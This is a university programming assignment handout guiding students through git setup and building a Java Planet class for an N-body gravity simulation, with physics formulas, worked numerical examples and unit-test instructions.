Well, if you do not check it. A new game update was launched, the 1.06e. Probably the last version from the mod will work with it. However I will make a update sooner or later, more probably later because I want add somethings as a new customized Star Wars Galaxy. With few lucky, I can make it.
Wow, man! Thanks for the hard work. I am downloading right now and this mod looks awesome!
def is alot of fun !
I really enjoy playing your mod thank you for all your hard work I been addicted to the game since I downloaded it lol. Is this the final or are you adding more stuff in the future?
Final would be more correct.
Nomada_Firefox donde puedo encontrar el patch , no tengo el juego comprando.
podrias pasar el patch 1.04 para el mod?
Compra el juego por favor. Yo no doy soporte a nadie que lo use pirateado.
|
https://www.moddb.com/mods/star-wars-polaris-sector-alliance
|
CC-MAIN-2022-05
|
refinedweb
| 865
| 77.23
|
.
Intro to Word XML Part 5: Opening custom XML files
I've been talking for awhile now about the support for custom defined schemas in Office. I'm actually going to pull together a post in the next week or so that addresses the uses and motivations behind the XML support we have in Office. We talk about XML a lot, and it should be clear by now that there are a ton of uses. From an Office point of view, there is no such thing as a single "XML editor", but instead a collection of tools that use XML to improve the power of their scenarios. Word can open generic XML, but that doesn't mean it should be used as a generic XML editor. It wouldn't really make sense to open Excel's XML in Word, since SpreadsheetML is used to describe a spreadsheet, and would be fairly difficult to edit in a Word processor. Of course Word and Excel both have a collection of shared functionality, but those are subsets of the larger overall set of functionality in each application. I plan to address this in more detail soon because I think it's really important to understand this when you are exploring the XML functionality and trying to determine what tools best suit your scenarios.
For today though let's talk about generic XML editing in Word. You can open any XML file you want it Word, and depending on how you set Word up, you can even teach Word to display your XML in a rich way. In part 3, I showed how you could create a WordprocessingML file that had your own XML in it as well. If you start with an XML file that is just made up of your XML, you can create an XSLT that will teach Word how to display your XML.
Let's start with a basic XML file:
<?xml version="1.0"?><s:employee xmlns: <s:name>Brian Jones</s:name> <s:occupation>Program Manager</s:occupation></s:employee>
Try opening that file in Word. The result should be that you get a simple text document with your tags showing. This gives the appearance that Word is able to internally open any XML file. This is actually not quite what's going on. It's really more similar to what happens when you open an XML file in IE without applying a transform. Word sees that the XML is not in it's namespace, so it looks to see if there is a transform specified. If there isn't a transform, Word will fall back to using a default XSLT that transforms into WordprocessingML. The transform that we use is found in the programs folder: c:\Program Files\Microsoft Office\OFFICE11\XML2WORD.XSL
Go ahead and open that file up. You'll see that we map custom XML into a hybrid of WordprocessingML and the custom XML. We apply some indentation based on how deep the tags are nested which gives you that tree view like appearance. We also specify that that XML tag view should be on, just like we did in the example I posted in part 3 of the intro to Word XML. Also notice that we create this tag: <w:removeWordSchemaOnSave w:. That tells Word that when the user hits the save button, the document should be saved as "data only", which removes the WordprocessingML. That's why you can open any generic XML file, make some edits, and press just press save.
Now, what I've just described doesn't exactly fit with what our goals were for the XML support in Word. We weren't trying to make Word into a generic XML editor. Our main goals were to make it much easier for people to build solutions in Word that were document based solutions. Word is a document editor, and by adding XML support to Word, the solutions you build become easier and more powerful. Visual Studio is really a better example of a generic XML editor.
If you want to open you're XML data in Word and have it formatted in a richer way than the default XSLT provides (which is probably almost always the case), then you can generate an XSLT. Let's say that we want to format this custom XML to look the same as the file looked that we built in part 3 of the intro to Word XML. We would just need to create an XSLT that output that same WordprocessingML. The XSLT would look something like this:
<?xml version="1.0"?><xsl:stylesheet <xsl:template <w:wordDocument> <w:docPr> <w:showXMLTags w: </w:docPr> <xsl:apply-templates /> </w:wordDocument> </xsl:template> <xsl:template <w:body> <s:employee> <w:p> <w:r> <w:rPr> <w:b /> </w:rPr> <w:t xml:Name: </w:t> </w:r> <s:name> <w:r> <w:t><xsl:value-of</w:t> </w:r> </s:name> </w:p> <w:p> <w:r> <w:rPr> <w:b /> </w:rPr> <w:t xml:Occupation: </w:t> </w:r> <s:occupation> <w:r> <w:t><xsl:value-of</w:t> </w:r> </s:occupation> </w:p> </s:employee> </w:body> </xsl:template></xsl:stylesheet>
Save that XSLT file onto you're machine and now open the custom XML file again in Word. Notice the task pane to the right called the "XML Document" pane. You can see that the "Data only" transform was applied, but you can choose to browse for a different one. Choose "Browse..." and find the XSLT file we just created. The XSLT should now be applied and you should have a file that looks really similar to the one we created the other week. We specified that the XML tag view should be off, but you can turn them back on by pressing "CTRL + Shift + X".
There's a simple example of creating an XSLT. You can now play around with changing properties in the XSLT so that the data is displayed in different ways.
-Brian
|
http://blogs.msdn.com/brian_jones/archive/2005/08/16/452478.aspx
|
crawl-002
|
refinedweb
| 1,009
| 67.89
|
catalogue
Maximum sum of 1 continuous subarrays
two Divide and conquer (official solution -- line segment tree)
3. Dynamic planning + temporary variables
4. Dynamic planning + in situ modification
1. Dynamic programming + 2D array
2. Open one more row and one more column 0 optimization code
dynamic programming
Maximum sum of 1 continuous subarrays
Sword finger Offer 42. Maximum sum of continuous subarrays
1. Violence Act
two Divide and conquer (official solution -- line segment tree)
This divide and conquer method is similar to the pushUp operation of "solving the longest common ascending subsequence problem with line segment tree". Maybe the reader hasn't touched the segment tree yet. It doesn't matter. The content of method 2 assumes that you don't have any basis for the segment tree. Of course, if readers are interested, it is recommended to read the segment tree interval merging method to solve the "interval longest continuous rising sequence problem" and "interval maximum sub segment sum problem" asked many times, which is still very interesting.
First define an operation get(a, l,r) Represents a query aa sequence The maximum sub segment sum in the [l,r] interval, then the final required answer is get(nums, 0, nums.size() - 1). How to divide and conquer to achieve this operation?
For an interval [l, R], let's take M = ⌊ (l+r)/2 ⌋, for the interval [l,m] and [m+1,r] Divide and conquer solution. When recursion goes deep layer by layer until the interval length is reduced to one Recursion "starts to pick up" when. Consider how to pass it at this time [l,m] Interval information and The information of [M + 1, R] interval is combined into interval [l,r][l,r] Information about. The two most critical issues are:
- What information do you want to maintain?
- How do you combine this information?
For an interval [l,r], we can maintain four quantities:
- Sum express [l,r] Inside l Is the maximum sub segment of the left endpoint and
- rSum express [l,r] Inside rr is the maximum sub segment sum of the right endpoint
- mSum express [l,r] Maximum sub segment and
- iSum express [l,r] Interval sum of
hereinafter referred to as [l,m] by [l,r] Left subinterval of [m+1,r] by [l,r] Right subinterval of. Consider how to maintain these quantities? (how to combine the information of the left and right subintervals to obtain [l,r] Information about the project)?
For length one Interval of [i,i], the values of the four quantities are the same as nums[i] equal. For lengths greater than one Interval of:
- First of all, the best maintenance is Isum, interval [l,r] of iSum It's equal to the left subinterval iSum Add "right sub interval" iSum.
- about There are two possibilities for the lSum of [l,r], which is either equal to the lSum of the "left subinterval" lSum, or iSum equal to "left subinterval" Add "right sub interval" lSum, whichever is greater.
- about [l,r] of rSum, similarly, it is either equal to the value of the "right subinterval" rSum, or iSum equal to "right subinterval" Add rSum of "left sub interval", and the two are larger.
- When the above three quantities are calculated, it is easy to calculate [l,r] mSum Yes. We can consider Msum of [l,r] Whether the corresponding interval crosses m——
- May not cross m. That is to say [l,r] mSum for It may be the mSum of the "left sub interval" And mSum of "right subinterval" One of;
- May also cross m. It may be rSum of "left subinterval" And lSum of "right subinterval" Sum.
- The last three are larger.
In this way, the problem has been solved.
class Solution { public class Status { public int lSum, rSum, mSum, iSum; public Status(int lSum, int rSum, int mSum, int iSum) { this.lSum = lSum; this.rSum = rSum; this.mSum = mSum; this.iSum = iSum; } } public int maxSubArray(int[] nums) { return getInfo(nums, 0, nums.length - 1).mSum; } public Status getInfo(int[] a, int l, int r) { if (l == r) { return new Status(a[l], a[l], a[l], a[l]); } int m = (l + r) >> 1; Status lSub = getInfo(a, l, m); Status rSub = getInfo(a, m + 1, r); return pushUp(lSub, rSub); } public Status pushUp(Status l, Status r) { int iSum = l.iSum + r.iSum; int lSum = Math.max(l.lSum, l.iSum + r.lSum); int rSum = Math.max(r.rSum, r.iSum + l.rSum); int mSum = Math.max(Math.max(l.mSum, r.mSum), l.rSum + r.lSum); return new Status(lSum, rSum, mSum, iSum); } }
3. Dynamic planning + temporary variables
Dynamic programming analysis:
Status definition: Set dynamic programming list dp , dp[i] represents the element num [i] Is the maximum sum of contiguous subarrays at the end.
- Why is the maximum sum defined Element must be included in DP [i] nums[i]: guarantee dp[i] Recursive to Correctness of dp[i+1]; If not nums[i], the recursion does not meet the requirements of the topic Continuous subarray requirement.
- Let dp be a one-dimensional array, where the value of dp[i] represents the largest subarray and sum of the array composed of the first I numbers .
- Transfer equation: If dp[i − 1] ≤ 0 , Description dp[i − 1] Yes, dp[i] Negative contribution, i.e. dp[i − 1]+nums[i] Not as good as nums[i] itself is large.
When dp[i − 1] > 0: execute dp[i]=dp[i − 1]+nums[i];
When dp[i − 1] ≤ 0: execute dp[i]=nums[i];
- Initial state: dp[0] = nums[i];, Namely The maximum sum of consecutive subarrays ending in num [0] is num [0] .
- Return value: Return dp The maximum value in the list represents the global maximum value.
4. Dynamic planning + in situ modification
Reduced space complexity:
- because dp[i] only with dp[i-1] and nums[i] So the original array can be nums be used as dp List, i.e. directly in nums You can modify it on the.
- As omitted dp The list uses additional space, so the space complexity from O(N) lower O(1) .
Complexity analysis:
- Time complexity O(N) : Linear ergodic array nums To get results, use o (n) Time.
- Spatial complexity O(1) : Use extra space of constant size.
2 maximum value of gifts
Sword finger Offer 47. Maximum value of gift
1. Dynamic programming + 2D array
package jzof.Day09; /** * @author ahan * @create_time 2021-11-11-11:45 morning * There is a gift in each grid of an m*n chessboard, and each gift has a certain value (value greater than 0). * You can start from the upper left corner of the chessboard to take the gifts in the grid, and move one grid to the right or down at a time until you reach the lower right corner of the chessboard. * Given the value of a chessboard and the gifts on it, please calculate the maximum value of gifts you can get? */ public class _47 { public static void main(String[] args) { int [][] nums = new int[][]{ {1,3,1}, {1,5,1}, {4,2,1} }; System.out.println(new _47().maxValue(nums)); } public int maxValue(int[][] grid) { int m = grid.length; int n = grid[0].length; int[][] dp = new int[m][n]; dp[0][0] = grid[0][0]; for (int i = 1; i < m; i++) { dp[i][0] = dp[i-1][0] + grid[i][0]; } for (int i = 1; i < n; i++) { dp[0][i] = dp[0][i-1] + grid[0][i]; } for (int i = 1; i < m; i++) { for (int j = 1; j < n; j++) { dp[i][j] = Math.max(dp[i-1][j], dp[i][j-1])+grid[i][j]; } } for (int i = 0; i < m; i++) { for (int j = 0; j < n; j++) { System.out.print(dp[i][j]+"\t"); } System.out.println(" "); } return dp[m-1][n-1]; } }
It's the same idea and method as the boss, hahaha ~ but the boss modified it in situ...
Space efficiency is not much worse~
Complexity analysis:
- Time complexity O(MN) : M,N Row height and column width of matrix respectively; Dynamic programming needs to traverse the whole grid Matrix, using O(MN) time.
- Space complexity O(1) : In place modification uses additional space of constant size.
2. Open one more row and one more column 0 optimization code
public int maxValue(int[][] grid) { int row = grid.length; int column = grid[0].length; //dp[i][j] represents the maximum value from grid[0][0] to grid[i - 1][j - 1] int[][] dp = new int[row + 1][column + 1]; for (int i = 1; i <= row; i++) { for (int j = 1; j <= column; j++) { dp[i][j] = Math.max(dp[i - 1][j], dp[i][j - 1]) + grid[i - 1][j - 1]; } } return dp[row][column]; }
|
https://programmer.help/blogs/ahan-jianzhi-offer-day-09-dynamic-programming-2.html
|
CC-MAIN-2021-49
|
refinedweb
| 1,464
| 62.07
|
Opened 4 years ago
Closed 4 years ago
#16868 closed Bug (invalid)
Typo in last code fragment in tutorial part 3
Description
Hi, thanks for the excellent tutorial. There's a typo in the last fragment of tutorial page 3, the refactored polls/urls.py:
from django.conf.urls import patterns, include, url
It should be "from django.conf.urls.default import..."
Change History (1)
comment:1 Changed 4 years ago by julien
- Needs documentation unset
- Needs tests unset
- Patch needs improvement unset
- Resolution set to invalid
- Status changed from new to closed
Note: See TracTickets for help on using tickets.
Thanks for the report, but I assume you must be looking at the wrong version of the doc (i.e. instead of). Since quite recently in r16818, the functions in django.conf.urls.defaults have been moved to django.conf.urls.
|
https://code.djangoproject.com/ticket/16868
|
CC-MAIN-2015-18
|
refinedweb
| 142
| 55.34
|
I am walking through the Jetson Nano AI course, and was using the nvdli-nano to run the CNN on Jetson Nano. I went through the code lines in the jupyter notebook, and don’t find a line that specify the training to be performed in GPU. I wonder if that is inferred somewhere, or set by default? If I have both a CPU and GPU, how should I allocate the computational power of each to perform the task?
Hi,
Please noted that Jetson is designed mainly for inference.
For training on Jetson, you can check if this page can meet your requirement:
To check if a framework is running on GPU, you can use the API like this:
import torch print(torch.cuda.is_available())
Thanks.
In the nvdli-nano notebooks, if you look at where the model is initially created, there are these lines of code:
device = torch.device('cuda') # model is created... model = model.to(device)
This tells PyTorch to run the model on the CUDA device, and hence both training and inference will be done using the GPU.
|
https://forums.developer.nvidia.com/t/course-project-using-gpu-acceleration/159278
|
CC-MAIN-2020-50
|
refinedweb
| 181
| 69.11
|
But I only want to run the for loop as long as the sum is < 9000. So the for loop runs while sum <9000. I can make it work by taking out the “while” and using “if sum > 9000 // break” instead, but I want to understand why the “while” approach is wrong?
it doesn’t work like that. The for loop will make all its iterations (loop over all elements in list)
The instructions state:
The function should sum the elements of the list until the sum is greater than
9000.
Therefore, if
sum has reached exactly
9000 and there are still additional elements to process, we’re not done yet. A common source of software bugs is failure to account for edge cases.
Hi all,
I’m looking for some feedback on my answer here. My code returns the right answer, but I ALSO get the error “list index out of range”. What do I need to improve in my code? Any feedback is appreciated! Thank you!
#Write your function here def over_nine_thousand(lst): count = lst[0] indice = 1 while(count < 9000 and indice < len(lst)): count += lst[indice] indice += 1 else: return count #Uncomment the line below when your function is done print(over_nine_thousand([8000, 900, 120, 5000]))
The exercise might have a test-case/corner case where you get an empty list. Which would a problem for your code
hi, i wonder why the second one is not working.
why is it indentation error?
Hey i am wondering why these are not correct:
1: def over_nine_thousand(lst): sum=0 for n in lst: sum+=n if sum >= 9000 and len(lst)>0: break return sum print(over_nine_thousand([8000, 900, 120, 5000])) The output will be none instead of 9020. 2: def over_nine_thousand(lst): sum=0 for n in lst: sum+=n if sum >= 9000 and len(lst)>0: break return sum print(over_nine_thousand([8000, 900, 120, 5000])) This one would be 8000.
Can someone explain why these two scripts are wrong? From my perspective, they are the same as the correct solution.
they are absolutely not the same as the solution. Both don’t cover the edge case of an empty list. If the list is empty, the loop never runs, so the return keywords are never reached
in the first example,
break would break the loop, so again, the return keyword isn’t reached.
its important to understand that when a return keyword is reached, data is handed back to the caller which signals the function is done executing
so in your second code sample, the return keyword is reached in the first iteration of the loop, handing back the sum of the first value.
This was my code for the Over 9000 exercise:
def over_nine_thousand(lst): sum1 = 0 for num in lst: if sum1 <= 9000: sum1 += num elif sum1 > 9000: return sum1 elif len(lst) == 0: return 0 print(over_nine_thousand([8000, 900, 120, 5000]))
I get the correct output for the exercise, yet this message appears at the bottom:
“over_nine_thousand([8000, 900]) should have returned 8900, and it returned None”
Thus, I am not able to progress. I checked the code in my terminal and achieved the same output.
The troubleshooting I tried involved attempting to print the value of “sum1”. The value would not print, however, no matter where I put the print command and no matter the indentation I tried, so my troubleshooting hit a brick wall (as far as trying to get the output to reveal any clues for me goes).
Try running the code in your head for the input given in the error message. The SCT for the exercise tests input other than the list given in the
[8000, 900]? The message states that it should return 8900 which is correct, no? Your code returns
None for that input. If you follow what happens with your finger or in your head, you’ll see that
None is returned. If the code inside a function is finished executing without a
return statement being executed, the function implicitly returns
None.
|
https://discuss.codecademy.com/t/faq-code-challenge-loops-over-9000/373367?page=5
|
CC-MAIN-2020-29
|
refinedweb
| 678
| 76.45
|
WINC1500 Module¶
This module implements the winc1500 wifi driver. At the moment some functionalities are missing:
- wifi ap mode
- wifi direct p2p mode
- internal firmware ota upgrade
It can be used to enable Arduino/Genuino MKR1000 wifi capabilities or with any other device mounting Microchip WINC1500 IEEE 802.11 network controller.
Zerynth driver current implementation supports only communication with the chip through standard SPI interface.
Note
Zerynth driver is based on Microchip driver version 19.5.4 provided with Advanced Software Framework version 3.37.0 requiring the internal Firmware to be upgraded at least to version 19.5.4. For the upgrading procedure follow this guide: Firmware Updater.
The WINC1500 chip supports secure connections through tls v1.2. To take advantage of this feature import the ssl module or simply try https requests with Zerynth requests module.
Note
To access securely specific websites root certificates must be loaded on the chip: Certificate Uploading.
To use the module expand on the following example:
from microchip.winc1500 import winc1500 as wifi_driver from wireless import wifi wifi_driver.auto_init() for retry in range(10): try: wifi.link("Network-SSID", wifi.WIFI_WPA2, "password") break except Exception as e: print(e) if not wifi.is_linked(): raise IOError
To initialize the driver the following parameters are needed:
- MCU SPI circuitry spidrv (one of SPI0, SPI1, ... check pinmap for details);
- chip select pin cs;
- interrupt pin int_pin;
- reset pin rst;
- enable pin enable;
- wake pin wake (can be not set);
- clock clock, default at 8MHz.
Note
For supported boards (e.g. Arduino/Genuino MKR1000), auto_init function is available with preset params.
|
https://docs.zerynth.com/latest/official/lib.microchip.winc1500/docs/official_lib.microchip.winc1500_winc1500.html
|
CC-MAIN-2020-24
|
refinedweb
| 264
| 58.48
|
A heads up before you even read the introduction: We are the beta testers for Gradescope's new grading system. There may be glitches at the beginning of the semester. Please be friendly.
Please report any errors using this autograder thread on Piazza.
Introduction
The goal of this project is to give you a crash course in Java. CS61B is not a course about Java, so we're going to race through the language in just 4 weeks. You've already taken CS61A, E7, or some equivalent course, so it's time to get used to learning languages quickly.
Before starting this project, we are assuming that you either have prior Java experience, or have watched lecture 2 and (ideally) have also completed HW0. If you have not watched lecture 2, do so now. The code that I built during that lecture can be found at this link. You do not need to fully understand the contents of lecture 2 to begin this assignment. Indeed, the main purpose of this project is to help you build some comfort with the material in that lecture.
Unlike later projects, this assignment has a great deal of scaffolding. Future assignments will require significantly more independence. For this project, you may work in pairs. To work in a pair, you must read the collaboration guide and fill out the partner request form linked in the partnership guide. You do not need to wait for our approval to begin as long as you meet the requirements for partnerships. If you work with someone who is more experienced, you are likely to miss lots of important subtleties, which will be painful later when you start working on your own (i.e. the entire second half of the course).
All that said, your goal for this project is to write a program simulating the motion of
N objects in a plane, accounting for the gravitational forces mutually affecting each object as demonstrated by Sir Issac Newton's Law of Universal Gravitation.
Ultimately, you will be creating a program
NBody.java that draws an animation of bodies floating around in space tugging on each other with the power of gravity.
If you run into problems, be sure to check out the FAQ section before posting to Piazza. We'll keep this section updated as questions arise during the assignment.
Getting the Skeleton Files
Before proceeding, make sure you have completed lab1, and if you are working on your own computer, that you have completed lab1b to set up your computer.
To do this, head to the folder containing your copy of your repository. For example, if your login is 'agz', then head to the 'agz' folder (or any subdirectory). If you're working with a partner, you should instead clone your partner repository, e.g.
git clone
If you're working solo, you should now be in your personal repo folder, e.g.
agz. If you're working with a partner, your computers should both be in the
bqd-aba folder that was created when you cloned the repo.
Now we'll make sure you have the latest copy of the skeleton files with by using
git pull skeleton master. If you're using your partner repo, you'll also need to set the remote just like we did in lab1 using the
git remote add skeleton command.
If the folder you're pulling into already has an older copy of the skeleton repo (from lab 1, for example), this will cause a so-called
merge (see git guide for more details if you want). A text editor will automatically open asking you to provide a message on why you are merging.
Depending on what computer you're using, you will possibly find yourself in one of two obtuse text editors:
- vim
- emacs
Both of these editors are designed with the power user in mind, with no regard for those stumbling into them by accident. Unfortunately, git will likely default to one of these text editors, meaning that the simple act of providing a merge message may cause you considerable consternation. Don't worry, this is normal! One of the goals of 61B is to teach you to handle these sorts of humps. Indeed, one of the reasons we're making you use a powerful real-world version control system like git this semester is to have you hit these common hurdles now in a friendly pedagogical environment instead of the terrifying real world. However, this also means we're going to suffer sometimes, particularly at this early point in the semester. Don't panic!
For reference, this is what vim looks like:
See this link if you are stuck in vim. If you are in emacs, type something and then press ctrl-x then ctrl-s to save, then ctrl-x then ctrl-c to exit.
Once you've successfully merged, you should see a proj0 directory appear with files that match the skeleton repostiory.
Note that if you did not already have a copy of the skeleton repo in your current folder, you will not be asked for a merge message.
If you somehow end up having a merge conflict, consult the git weird technical failures guide.
If you get some sort of error, STOP and either figure it out by carefully reading the the git guide or seek help at OH or Piazza. You'll potentially save yourself a lot of trouble vs. guess-and-check with git commands. If you find yourself trying to use commands you Google like
force push, don't.
The Planet Class and Its Constructor
You'll start by creating a Planet class. In your favorite text editor, create a file called
Planet.java. If you haven't picked a text editor, I recommend Sublime Text. Remember that your .java files should have the same name as the class it contains.
Begin by creating a basic version of the Planet class with the following 6 instance variables:
double xxPos: Its current x position
double yyPos: Its current y position
double xxVel: Its current velocity in the x direction
double yyVel: Its current velocity in the y direction
double mass: Its mass
String imgFileName: The name of an image in the
imagesdirectory that depicts the planet
Your instance varaibles must be named exactly as above. Start by adding in two Planet constructors that can initialize an instance of the Planet class. The signature of the first constructor should be:
public Planet(double xP, double yP, double xV, double yV, double m, String img)
Note: We have given parameter names which are different than the corresponding instance variable name. If you insist on making the parameter names the same as the instance variable names for aesthetic reasons, make sure to use the "this" keyword appropriately (mentioned only briefly in lecture and not at all in HFJ).
The second constructor should take in a Planet object and initialize an identical Planet object (i.e. a copy). The signature of the second constructor should be:
public Planet(Planet p)
Your Planet class should NOT have a main method, because we'll never run the Planet class directly (i.e. we will never do
java Planet). Also, the word "static" should not appear anywhere in your Planet class.
All of the numbers for this project will be doubles. We'll go over what exactly a double is later in the course, but for now, think of it is a real number, e.g.
double x = 3.5. In addition, all instance variables and methods will be declared using the public keyword.
Once you have filled in the constructors, you can test it out by compiling your
Planet.java file and the
TestPlanetConstructor.java file we have provided.
You can compile with the command:
javac Planet.java TestPlanetConstructor.java
You can run our provided test with the command
java TestPlanetConstructor
If you pass this test, you're ready to move on to the next step. Do not proceed until you have passed this test.
Understanding the Physics
Let's take a step back now and look at the physics behind our simulations. Our
Planet objects will obey the laws of Newtonian physics. In particular, they will be subject to:
Pairwise Force: Newton's law of universal gravitation asserts that the strength of the gravitational force between two particles is given by the product of their masses divided by the square of the distance between them, scaled by the gravitational constant G (6.67 * 10-11 N-m2 / kg2). The gravitational force exerted on a particle is along the straight line between them (we are ignoring here strange effects like the curvature of space). Since we are using Cartesian coordinates to represent the position of a particle, it is convenient to break up the force into its x- and y-components (Fx, Fy). The relevant equations are shown below. We have not derived these equations, and you should just trust us.
- F = G * m1 * m2 / r2
- r2 = dx2 + dy2
- Fy = F * dy / r
- Fx = F * dx / r
Note that force is a vector (i.e., it has direction). In particular, be aware that dx and dy are signed (positive or negative).
- Net Force: The principle of superposition says that the net force acting on a particle in the x- or y-direction is the sum of the pairwise forces acting on the particle in that direction.
In addition, all planets have:
Acceleration: Newton's second law of motion says that the accelerations in the x- and y-directions are given by:
- ax = Fx / m
- ay = Fy / m
Check your understanding!
Consider a small example consisting of two celestial objects: Saturn and the Sun. Suppose the Sun is at coordinates (1.0 * 1012, 2.0 * 1011) and Saturn is at coordinates (2.3 * 1012, 9.5 * 1011). Assume that the Sun's mass is 2.0 * 1030 Kg and Saturn's mass is 6.0 * 1026 Kg. Here's a diagram of this simple solar system:
Let's run through some sample calculations. First let's compute F1, the force that Saturn exerts on the Sun. We'll begin by calculating r, which we've already expressed above in terms of dx and dy. Since we're calculating the force exerted by Saturn, dx is Saturn's x-position minus Sun's x-position, which is 1.3 * 1012 meters. Similarly, dy is 7.5 * 1011 meters.
So, r2 = dx2 + dy2 = (1.3 * 1012 m)2 + (7.5 * 1011 m)2. Solving for r gives us 1.5 * 1012 meters. Now that we have r, computation of F is straightforward:
- F = G * (2.0 * 1030 Kg) * (6.0 * 1026 Kg) / (1.5 * 1012 m)2 = 3.6 * 1022 N
Note that the magnitudes of the forces that Saturn and the Sun exert on one another are equal; that is, |F| = |F1| = |F2|. Now that we've computed the pairwise force on the Sun, let's compute the x and y-components of this force, denoted with F1,x and F1,y, respectively. Recall that dx is 1.3 * 1012 meters and dy is 7.5 * 1011 meters. So,
- F1,x = F1 * (1.3 * 1012 m) / (1.5 * 1012 m) = 3.1 * 1022 N
- F1,y = F1 * (7.5 * 1011 m) / (1.5 * 1012 m) = 1.8 * 1022 N
Note that the sign of dx and dy is important! Here, dx and dy were both positive, resulting in positive values for F1,x and F1,y. This makes sense if you look at the diagram: Saturn will exert a force that pulls the Sun to the right (positive F1,x ) and up (positive F1,y).
Next, let's compute the x and y-components of the force that the Sun exerts on Saturn. The values of dx and dy are negated here, because we're now measuring the displacement of the Sun relative to Saturn. Again, you can verify that the signs should be negative by looking at the diagram: the Sun will pull Saturn to the left (negative dx) and down (negative dy).
- F2,x = F2 * (-1.3 * 1012 m) / (1.5 * 1012 m) = -3.1 * 1022 N
- F2,y = F2 * (-7.5 * 1011 m) / (1.5 * 1012 m) = -1.8 * 1022 N
Below, you'll write the methods
calcForceExertedByX and
calcForceExertedByY in the
Planet class. When you're done with those methods,
sun.calcForceExertedByX(saturn) and
sun.calcForceExertedByY(saturn) should return F1,x and F1,y, respectively; similarly,
saturn.calcForceExertedByX(sun) and
saturn.calcForceExertedByY(sun) should return F2,x and F2,y, respectively.
Let's add Neptune to the mix and calculate the net force on Saturn. Here's a diagram illustrating the forces being exerted on Saturn in this new system:
We can calculate the x-component of the net force on Saturn by summing the x-components of all pairwise forces. Likewise, Fnet,y can be calculated by summing the y-components of all pairwise forces. Assume the forces exerted on Saturn by the Sun are the same as above, and that F2,x = 1.1 * 1022 N and F2,y = 9.0 * 1021 N.
- Fnet,x = F1,x + F2,x = -3.1 * 1022 N + 1.1 * 1022 N = -2.0 * 1022 N
- Fnet,y = F1,y + F2,y = -1.8 * 1022 N + 9.0 * 1021 N = -9.0 * 1021 N
Double check your understanding!
Suppose there are three bodies in space as follows:
- Samh: x = 1, y = 0, mass = 10
- AEgir: x = 3, y = 3, mass = 5
- Rocinante: x = 5, y = -3, mass = 50
Calculate Fnet,x and Fnet,y exerted on Samh. To check your answer, click here for the net x force and here for the net y force.
Writing the Planet Class
In our program, we'll have instances of Planet class do the job of calculating all the numbers we learned about in the previous example. We'll write helper methods, one by one, until our Planet class is complete.
calcDistance
Start by adding a method called
calcDistance that calculates the distance between two Planets. This method will take in a single Planet and should return a double equal to the distance between the supplied planet and the planet that is doing the calculation, e.g.
samh.calcDistance(rocinante);
It is up to you this time to figure out the signature of the method. Once you have completed this method, go ahead and recompile and run the next unit test to see if your code is correct.
Compile with:
javac Planet.java TestCalcDistance.java
and run with
java TestCalcDistance
Hint: In Java, there is no built in operator that does squaring or exponentiation. We recommend simply multiplying a symbol by itself instead of using
Math.pow, which will result in slower code.
Hint 2: Always try googling before asking questions on Piazza. Knowing how to find what you want on Google is a valuable skill. However, know when to give up! If you start getting frustrated with your search attempts, turn to Piazza.
calcForceExertedBy
The next method that you will implement is
calcForceExertedBy. The
calcForceExertedBy method takes in a planet, and returns a double describing the force exerted on this planet by the given planet. You should be calling the
calcDistance method in this method. For example
samh.calcForceExertedBy(rocinante) for the numbers in "Double Check Your Understanding" return 1.334 * 10-9.
NOTE: Do not use Math.abs to fix sign issues with these methods. This will cause issues later when drawing planets.
Once you've finished
calcForceExertedBy, re-compile and run the next unit test.
javac Planet.java TestCalcForceExertedBy.java java TestCalcForceExertedBy
calcForceExertedByX and calcForceExertedByY
The next two methods that you should write are
calcForceExertedByX and
calcForceExertedByY. Unlike the
calcForceExertedBy method, which returns the total force, these two methods describe the force exerted in the X and Y directions, respectively. Once you've finished, you can recompile and run the next unit test. For example
samh.calcForceExertedByX(rocinante) in "Double Check Your Understanding" should return 1.0672 * 10-9.
javac Planet.java TestCalcForceExertedByXY.java java TestCalcForceExertedByXY
calcNetForceExertedByX and calcNetForceExertedByY
Write methods
calcNetForceExertedByX and
calcNetForceExertedByY that each take in an array of Planets and calculate the net X and net Y force exerted by all planets in that array upon the current Planet. For example, consider the code snippet below:
Planet[] allPlanets = {samh, rocinante, aegir}; samh.calcNetForceExertedByX(allPlanets); samh.calcNetForceExertedByY(allPlanets);
The two calls here would return the values given in "Double Check Your Understanding."
As you implement these methods, remember that Planets cannot exert gravitational forces on themselves! Can you think of why that is the case (hint: the universe will possibly collapse in on itself, destroying everything including you)? To avoid this problem, ignore any planet in the array that is equal to the current planet. To compare two planets, use the .equals method:
samh.equals(samh) (which would return true).
When you are done go ahead and run:
javac Planet.java TestCalcNetForceExertedByXY.java java TestCalcNetForceExertedByXY
If you're tired of the verbosity of for loops, you might consider reading about less verbose looping constructs (for and the 'enhanced for') given on page 114-116 of HFJ, or online at this link. This is not necessary to complete the project.
update
Next, you'll add a method that determines how much the forces exerted on the planet will cause that planet to accelerate, and the resulting change in the planet's velocity and position in a small period of time dt. For example,
samh.update(0.005, 10, 3) would adjust the velocity and position if an x-force of 10 Newtons and a y-force of 3 Newtons were applied for 0.005 seconds.
You must compute the movement of the Planet using the following steps:
- Calculate the acceleration using the provided x and y forces.
- Calculate the new velocity by using the acceleration and current velocity. Recall that accleration describes the change in velocity per unit time, so the new velocity is (vx + dt * ax, vy + dt * ay).
- Calculate the new position by using the velocity computed in step 2 and the current position. The new position is (px + dt * vx, py + dt * vy).
Let's try an example! Consider a squirrel initially at position (0, 0) with a vx of 3 m/s and a vy of 5 m/s. Fnet,x is -5 N and Fnet,y is -2 N. Here's a diagram of this system:
We'd like to update with a time step of 1 second. First, we'll calculate the squirrel's net acceleration:
- anet,x = Fnet,x / m = -5 N / 1 Kg = -5 m/s2
- anet,y = Fnet,y / m = -2 N / 1 Kg = -2 m/s2
With the addition of the acceleration vectors we just calculated, our system now looks like this:
Second, we'll calculate the squirrel's new velocity:
- vnew,x = vold,x + dt * anet,x = 3 m/s + 1 s * -5 m/s2 = -2 m/s
- vnew,y = vold,y + dt * anet,y = 5 m/s + 1 s * -2 m/s2 = 3 m/s
Third, we'll calculate the new position of the squirrel:
- pnew,x = pold,x + dt * vnew,x = 0 m + 1 s * -2 m/s = -2 m
- pnew,y = pold,y + dt * vnew,y = 0 m + 1 s * 3 m/s = 3 m
Here's a diagram of the updated system:
For math/physics experts: You may be tempted to write a more accurate simulation where the force gradually increases over the specified time window. Don't! Your simulation must follow exactly the rules above.
Write a method
update(dt, fX, fY) that uses the steps above to update the planet's position and velocity instance variables (this method does not need to return anything).
Once you're done, recompile and test your method with:
javac Planet.java TestUpdate.java java TestUpdate
Once you've done this, you've finished implementing the physics. Hoorah! You're halfway there.
